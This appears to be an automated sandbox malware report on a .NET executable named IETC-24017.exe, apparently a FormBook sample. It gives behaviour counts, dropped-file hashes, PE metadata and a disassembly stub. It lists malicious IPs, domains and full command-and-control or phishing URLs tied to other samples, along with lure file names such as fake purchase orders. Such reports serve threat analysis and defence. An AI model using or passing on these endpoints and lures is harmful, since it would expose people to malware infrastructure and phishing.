                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                • VT rate limit hit for: IETC-24017.exe

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                03:41:58API Interceptor2x Sleep call for process: IETC-24017.exe modified
                                                                                                                                                03:42:01API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                                                03:42:51API Interceptor10010512x Sleep call for process: openfiles.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                209.74.77.108VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.urbanxplore.info/chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4
                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.mindfulmo.life/grm8/
                                                                                                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.hobbihub.info/i5gf/
                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.mindfulmo.life/grm8/
                                                                                                                                                212.123.41.108order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?6LmleBl0=cFpkcfNONqUjMBTzp5cpXnBVfAWhcDIzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcsoLZzAcibydZloKa433i5tqev&UxyDX=VNL8-ZSx
                                                                                                                                                order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?uJ=cFpkcfNONqUjMBTzp5cpXnBVfAWhcDIzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcsoIcwEuaW18Akoaa4332kgKev&8z=fhbX
                                                                                                                                                svo0k2D8I1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.barvingl.online/kqa8/?96t8h=cFpkcfNONqUjMBTslZcHXQUURlu1IQQzJVOZSMm9giM6Fyw/9VhImr06LAIYzGnJMes5RjCp2F6lBnm9QzcvloZyAvKo1OlciQ==&knSHc=IHPtK27HtPe
                                                                                                                                                10-2023.xlsx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.cannabis-online-club.com/h98d/?5BtH50=KvtLQh4w1H83c0WibI9Kl3pV24lZ64IQb4SisRJ4OMWuLt1e1z+A+6kuafT+sn2kZrqQySi5S2hvsgUjTVBHdt7anP7qgyU3DT6EkumJFweH&2034-=Trm05BePQnXh
                                                                                                                                                FnhGaHsRol.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/?VmhTbl=vc3mRvjcopo&M3=Nh4RiXGq9rirxprZxwngEkCRtuUg03Wk9sPut6Ss0OLP0uwrDSENrdr+PTD7hSRCFu7YxcmD4E3jR7sCfZfUunQrWBvxCOQLEA==
                                                                                                                                                eK7wjZyiSZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/
                                                                                                                                                Purchase_order.vbeGet hashmaliciousFormBook, GuLoader, PlayBrowse
                                                                                                                                                • www.elephant-jobs.com/mfz6/?_Co=QntwWSnq4bm&a_E4inV=Nh4RiXGq9rirxprZwAqoDkeTpuJRiiik9sPut6Ss0OLP0uwrDSENrdv+PTD7hSRCFu7YxcmD4E3jR7sCfZfUnDQddSn0VdgxEQ==
                                                                                                                                                PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/n65e/?vsc5CQEL=zpix8XPaCaLMbMuJKxLl5xKAf/vHqb+EOSSsuRjy9k3iOcFCF+QQ9dJdWTNAbhWoOF60wuKwrIwmvoIcofYNeJtgTez+3V4dYIfUZ5DrFQ70&BOlc_j=zr9WAC
                                                                                                                                                PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.elephant-jobs.com/n65e/?JBlCXoB=zpix8XPaCaLMbMuJKxLl5xKAf/vHqb+EOSSsuRjy9k3iOcFCF+QQ9dJdWTNAbhWoOF60wuKwrIwmvoIcofYNTuVWZNb+zEQRfw==&ik_E=eSJ0Nu0lvfR1d
                                                                                                                                                Hesap ekstresi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.ifkosterakerfk.com/vy03/?lJBlS2K=+sMfLenlH3CD0A2XifXl9426qhEBL6Gr00HWq0CAArGlu59HMsqqo3E0Ru5fuFbWK76V&l0D0=aHqLWrUP
                                                                                                                                                185.27.134.144purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.amayavp.xyz/d9ku/
                                                                                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.amayavp.xyz/dcdf/
                                                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.amayavp.xyz/d9ku/
                                                                                                                                                shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.hasthosting.xyz/04fb/
                                                                                                                                                SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • www.hasthosting.xyz/04fb/
                                                                                                                                                http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • outlook-accede-aqui.iceiy.com/jquery.min.js

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                www.amayavp.xyzpurchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                www.127358.winneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 206.238.89.119
                                                                                                                                                www.canadavinreport.siteQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                www.izmirescortg.xyzfile.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 172.67.186.192
                                                                                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 104.21.36.62

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                EPAG-ASDEAMM9Xsyg59.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                • 212.123.43.16
                                                                                                                                                order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                svo0k2D8I1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                10-2023.xlsx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                FnhGaHsRol.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                eK7wjZyiSZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                Purchase_order.vbeGet hashmaliciousFormBook, GuLoader, PlayBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 212.123.41.108
                                                                                                                                                WILDCARD-ASWildcardUKLimitedGBpurchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2QGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 185.27.134.231
                                                                                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.206
                                                                                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 185.27.134.144
                                                                                                                                                https://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.deGet hashmaliciousUnknownBrowse
                                                                                                                                                • 185.27.134.155
                                                                                                                                                INTERQGMOInternetIncJPSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 163.44.185.183
                                                                                                                                                exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                • 157.7.164.178
                                                                                                                                                https://us-west-2.protection.sophos.com/?d=vercel.app&u=aHR0cHM6Ly93ZWJtYWlsLWF1dGgtc2VjLnZlcmNlbC5hcHA=&i=NWVjYjQ2MzZmNTgwNWIwZWJlZWZkM2Fl&t=UXZ3YkZpNSszWkdZNlBPdUNtNGVRQTM2ZzV1SmdscHZTN2E0TDhEQUVMYz0=&h=41cf60c27bc24f608fa5f6f60edfa437&s=AVNPUEhUT0NFTkNSWVBUSVYWbs5htFrsKfDZKi2vxyeN8JAV7eyBc8AqkmOaHaHVi8YGx5zRAzUm2TNYTJQ1rCs#Ymtqb29AaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                                                                                                                • 150.95.219.20
                                                                                                                                                Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 163.44.185.183
                                                                                                                                                TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 150.95.254.16
                                                                                                                                                botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 150.95.219.222
                                                                                                                                                spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                • 157.7.100.20
                                                                                                                                                RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 150.95.254.16
                                                                                                                                                DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 163.44.176.12
                                                                                                                                                r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 133.130.35.90
                                                                                                                                                MULTIBAND-NEWHOPEUSPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.109
                                                                                                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.109
                                                                                                                                                VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.108
                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.108
                                                                                                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.107
                                                                                                                                                PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.109
                                                                                                                                                Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.109
                                                                                                                                                payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.109
                                                                                                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 209.74.77.108
                                                                                                                                                http://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                                                                                                                • 209.74.95.101

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IETC-24017.exe.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\IETC-24017.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2232
                                                                                                                                                Entropy (8bit):5.379828835936797
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:tWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:tLHxvCsIfA2KRHmOugo1s
                                                                                                                                                MD5:9428C7E0853A13FBA7C8F7CF03B3B7A4
                                                                                                                                                SHA1:ADEDDF06890E98ECBB53BFEEE6719517BB49FF0B
                                                                                                                                                SHA-256:0E9C782844A0FF5406890E603F75740D4D31A7728F3CC21BB78B3C2A9B31635B
                                                                                                                                                SHA-512:808278D90B09BF7333ACF6B6A2539855986426AEB33F9FE0D6CF3844361E0C9D7CBAA3D5A2338D6151A497C14EBDD1732AB3278E8B41DB5E321588D6B889AFEF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                C:\Users\user\AppData\Local\Temp\_22L-I54

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wqk5mbk.x0h.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kll1lkb0.amr.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhic3f1q.ttp.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vi0j52ei.xu0.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Entropy (8bit):7.936017984768394
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                File name:IETC-24017.exe
                                                                                                                                                File size:768'512 bytes
                                                                                                                                                MD5:2d9da996ec68d0ac26b84d52a3298383
                                                                                                                                                SHA1:730f898be0b7296a0b554889567e97eef497b7b6
                                                                                                                                                SHA256:c5523d6938b41d9f2b512ca472f570145539087597f4f31e3e62060e88b03c48
                                                                                                                                                SHA512:79f302dba28e254eac6f1a0bcabaaa5c9aae112fea19d06375e827ed9f7365991fc52c1385c4e8a6dc98aba4de3c0902f1383add704628d75db4d995d821d5fe
                                                                                                                                                SSDEEP:12288:2sMdD3RbeXg2gVUpWoRVW9LQ67JLTNn9VaXHn6NThxO+fkz:2TdD35eXg2gboRVuLQ67HaXn69
                                                                                                                                                TLSH:ACF41252B2A0DF22D27A47B65859928003F965169263E32C4FDEF0DB1FB3F024A61F47
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:4f050d0d0d054f90

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x4bbc96
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0xA1FAACB2 [Sat Feb 12 05:46:26 2056 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
